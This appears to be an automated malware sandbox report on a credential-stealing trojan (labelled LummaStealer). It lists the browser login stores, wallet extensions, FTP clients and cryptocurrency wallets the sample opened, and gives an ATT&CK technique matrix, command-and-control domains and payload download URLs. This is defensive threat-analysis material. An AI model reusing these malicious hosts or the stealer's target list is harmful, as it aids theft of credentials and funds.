              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GNLQNHOLWBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GNLQNHOLWBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1408564784.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1435311387.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1438497350.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1409004952.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1361660637.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1408596086.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1384947171.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1384897360.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1435026656.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1435268441.0000000000F64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1362364363.0000000000F64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1386013914.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              12
              Process Injection
              34
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              751
              Security Software Discovery
              Remote Services41
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              12
              Process Injection
              LSASS Memory34
              Virtualization/Sandbox Evasion
              Remote Desktop ProtocolData from Removable Media11
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account Manager2
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information
              NTDS1
              File and Directory Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing
              LSA Secrets223
              System Information Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe39%ReversingLabsWin32.Trojan.LummaStealer
              file.exe100%AviraTR/Crypt.ZPACK.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://cook-rain.sbs/Hf100%Avira URL Cloudmalware
              https://cook-rain.sbs/zf100%Avira URL Cloudmalware
              https://cook-rain.sbs/Wf100%Avira URL Cloudmalware
              https://cook-rain.sbs/api_100%Avira URL Cloudmalware
              https://cook-rain.sbs/Af100%Avira URL Cloudmalware
              https://cook-rain.sbs/apibe100%Avira URL Cloudmalware
              http://185.215.113.16/steam/random.exeI100%Avira URL Cloudphishing
              NameIPActiveMaliciousAntivirus DetectionReputation
              cook-rain.sbs
              104.21.66.38
              truefalse
                high
                www.google.com
                142.250.181.68
                truefalse
                  high
                  s-part-0035.t-0009.t-msedge.net
                  13.107.246.63
                  truefalse
                    high
                    js.monitor.azure.com
                    unknown
                    unknownfalse
                      high
                      mdec.nelreports.net
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        peepburry828.sbsfalse
                          high
                          p10tgrace.sbsfalse
                            high
                            processhol.sbsfalse
                              high
                              https://cook-rain.sbs/apifalse
                                high
                                https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                                  high
                                  p3ar11fter.sbsfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_114.7.drfalse
                                      high
                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0file.exe, 00000000.00000003.1410078030.00000000056AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1362400904.00000000056B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362301330.00000000056CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1362400904.00000000056B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362301330.00000000056CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_114.7.drfalse
                                              high
                                              https://www.linkedin.com/cws/share?url=$chromecache_95.7.dr, chromecache_106.7.drfalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1362400904.00000000056B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362301330.00000000056CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://github.com/Youssef1313chromecache_114.7.drfalse
                                                    high
                                                    https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_95.7.dr, chromecache_106.7.drfalse
                                                      high
                                                      https://aka.ms/msignite_docs_bannerchromecache_95.7.dr, chromecache_106.7.drfalse
                                                        high
                                                        https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_106.7.drfalse
                                                          high
                                                          http://polymer.github.io/AUTHORS.txtchromecache_95.7.dr, chromecache_106.7.drfalse
                                                            high
                                                            https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_114.7.drfalse
                                                              high
                                                              https://cook-rain.sbs/Hffile.exe, 00000000.00000003.1384947171.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1384897360.0000000000F63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_95.7.dr, chromecache_106.7.drfalse
                                                                high
                                                                https://cook-rain.sbs/apibefile.exe, 00000000.00000003.1408564784.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1409004952.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1408596086.0000000000F6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_114.7.drfalse
                                                                  high
                                                                  http://x1.c.lencr.org/0file.exe, 00000000.00000003.1408794426.00000000056CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://x1.i.lencr.org/0file.exe, 00000000.00000003.1408794426.00000000056CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://aka.ms/pshelpmechoosechromecache_95.7.dr, chromecache_106.7.drfalse
                                                                        high
                                                                        https://aka.ms/feedback/report?space=61chromecache_114.7.dr, chromecache_77.7.drfalse
                                                                          high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1362400904.00000000056B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362301330.00000000056CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://learn-video.azurefd.net/vod/playerchromecache_95.7.dr, chromecache_106.7.drfalse
                                                                              high
                                                                              https://twitter.com/intent/tweet?original_referer=$chromecache_95.7.dr, chromecache_106.7.drfalse
                                                                                high
                                                                                https://github.com/gewarrenchromecache_114.7.drfalse
                                                                                  high
                                                                                  http://185.215.113.16/off/def.exepleWebKit/537.36file.exe, 00000000.00000002.1677932889.0000000000CFA000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cook-rain.sbs/zffile.exe, 00000000.00000003.1435311387.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1435026656.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1435268441.0000000000F64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1409785143.00000000057C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://polymer.github.io/CONTRIBUTORS.txtchromecache_95.7.dr, chromecache_106.7.drfalse
                                                                                        high
                                                                                        https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_114.7.drfalse
                                                                                          high
                                                                                          https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_114.7.drfalse
                                                                                            high
                                                                                            https://client-api.arkoselabs.com/v2/api.jschromecache_95.7.dr, chromecache_106.7.drfalse
                                                                                              high
                                                                                              https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnlchromecache_95.7.dr, chromecache_106.7.drfalse
                                                                                                high
                                                                                                https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_95.7.dr, chromecache_106.7.drfalse
                                                                                                  high
                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1362400904.00000000056B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362301330.00000000056CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://github.com/Thrakachromecache_114.7.drfalse
                                                                                                      high
                                                                                                      http://185.215.113.16/steam/random.exeIfile.exe, 00000000.00000002.1678088995.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: phishing
                                                                                                      unknown
                                                                                                      http://polymer.github.io/PATENTS.txtchromecache_95.7.dr, chromecache_106.7.drfalse
                                                                                                        high
                                                                                                        https://aka.ms/certhelpchromecache_95.7.dr, chromecache_106.7.drfalse
                                                                                                          high
                                                                                                          http://185.215.113.16/steam/random.exefile.exe, 00000000.00000002.1678088995.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.file.exe, 00000000.00000003.1410078030.00000000056AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://cook-rain.sbs/file.exe, 00000000.00000003.1435268441.0000000000F64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1362400904.00000000056B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362301330.00000000056CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1408794426.00000000056CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://github.com/mairawchromecache_114.7.drfalse
                                                                                                                      high
                                                                                                                      http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1408794426.00000000056CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://schema.orgchromecache_106.7.drfalse
                                                                                                                          high
                                                                                                                          http://polymer.github.io/LICENSE.txtchromecache_95.7.dr, chromecache_106.7.drfalse
                                                                                                                            high
                                                                                                                            https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1362400904.00000000056B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362301330.00000000056CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://cook-rain.sbs/Affile.exe, 00000000.00000003.1435311387.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1435026656.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1435268441.0000000000F64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              unknown
                                                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1409785143.00000000057C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://aka.ms/yourcaliforniaprivacychoiceschromecache_114.7.drfalse
                                                                                                                                  high
                                                                                                                                  https://cook-rain.sbs/apigsfile.exe, 00000000.00000003.1608864817.0000000000F54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1362400904.00000000056B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362301330.00000000056CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://github.com/nschonnichromecache_114.7.drfalse
                                                                                                                                        high
                                                                                                                                        https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05chromecache_95.7.dr, chromecache_106.7.drfalse
                                                                                                                                          high
                                                                                                                                          https://github.com/adegeochromecache_114.7.drfalse
                                                                                                                                            high
                                                                                                                                            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.1410078030.00000000056AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://github.com/jonschlinkert/is-plain-objectchromecache_95.7.dr, chromecache_106.7.drfalse
                                                                                                                                                high
                                                                                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1408794426.00000000056CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://octokit.github.io/rest.js/#throttlingchromecache_95.7.dr, chromecache_106.7.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&ufile.exe, 00000000.00000003.1410078030.00000000056AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9efile.exe, 00000000.00000003.1410078030.00000000056AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgfile.exe, 00000000.00000003.1410078030.00000000056AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://cook-rain.sbs/Wffile.exe, 00000000.00000003.1384947171.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1384897360.0000000000F63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                          unknown
                                                                                                                                                          https://github.com/js-cookie/js-cookiechromecache_95.7.dr, chromecache_106.7.drfalse
                                                                                                                                                            high
                                                                                                                                                            http://185.215.113.16/off/def.exefile.exe, 00000000.00000003.1608807253.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1678088995.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://schema.org/Organizationchromecache_114.7.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://channel9.msdn.com/chromecache_95.7.dr, chromecache_106.7.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1362400904.00000000056B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362301330.00000000056CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://github.com/dotnet/trychromecache_95.7.dr, chromecache_106.7.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctafile.exe, 00000000.00000003.1410078030.00000000056AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://cook-rain.sbs/api_file.exe, 00000000.00000003.1608864817.0000000000F54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                        unknown
                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                        13.107.246.63
                                                                                                                                                                        s-part-0035.t-0009.t-msedge.netUnited States
                                                                                                                                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                        185.215.113.16
                                                                                                                                                                        unknownPortugal
                                                                                                                                                                        206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                        104.21.66.38
                                                                                                                                                                        cook-rain.sbsUnited States
                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                        239.255.255.250
                                                                                                                                                                        unknownReserved
                                                                                                                                                                        unknownunknownfalse
                                                                                                                                                                        142.250.181.68
                                                                                                                                                                        www.google.comUnited States
                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                        IP
                                                                                                                                                                        192.168.2.7
                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                        Analysis ID:1559587
                                                                                                                                                                        Start date and time:2024-11-20 17:40:15 +01:00
                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                        Overall analysis duration:0h 7m 35s
                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                        Report type:full
                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                        Number of analysed new started processes analysed:13
                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                        Technologies:
                                                                                                                                                                        • HCA enabled
                                                                                                                                                                        • EGA enabled
                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                        Sample name:file.exe
                                                                                                                                                                        Detection:MAL
                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@24/64@9/6
                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                        HCA Information:
                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 199.232.214.172, 172.217.19.238, 2.18.86.16, 74.125.205.84, 172.217.21.35, 2.20.41.214, 34.104.35.123, 20.42.65.93, 142.250.181.74, 142.250.181.10, 142.250.181.138, 172.217.19.234, 172.217.19.202, 216.58.208.234, 142.250.181.42, 172.217.17.74, 172.217.17.42, 142.250.181.106, 104.86.110.81, 2.16.34.35, 104.86.110.35, 13.74.129.1, 204.79.197.237, 13.107.21.237, 172.217.17.67, 172.217.17.46
                                                                                                                                                                        • Excluded domains from analysis (whitelisted): onedscolprdeus20.eastus.cloudapp.azure.com, slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, time.windows.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, clients2.google.com, go.microsoft.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, c-bing-com.dual-a-0034.a-msedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, browser.events.data.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, c.bing.com, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, dual-a-0034.a-msedge.net, clients.l.google.com, c1.microsoft.com, wcps
                                                                                                                                                                        • Execution Graph export aborted for target file.exe, PID 7476 because there are no executed function
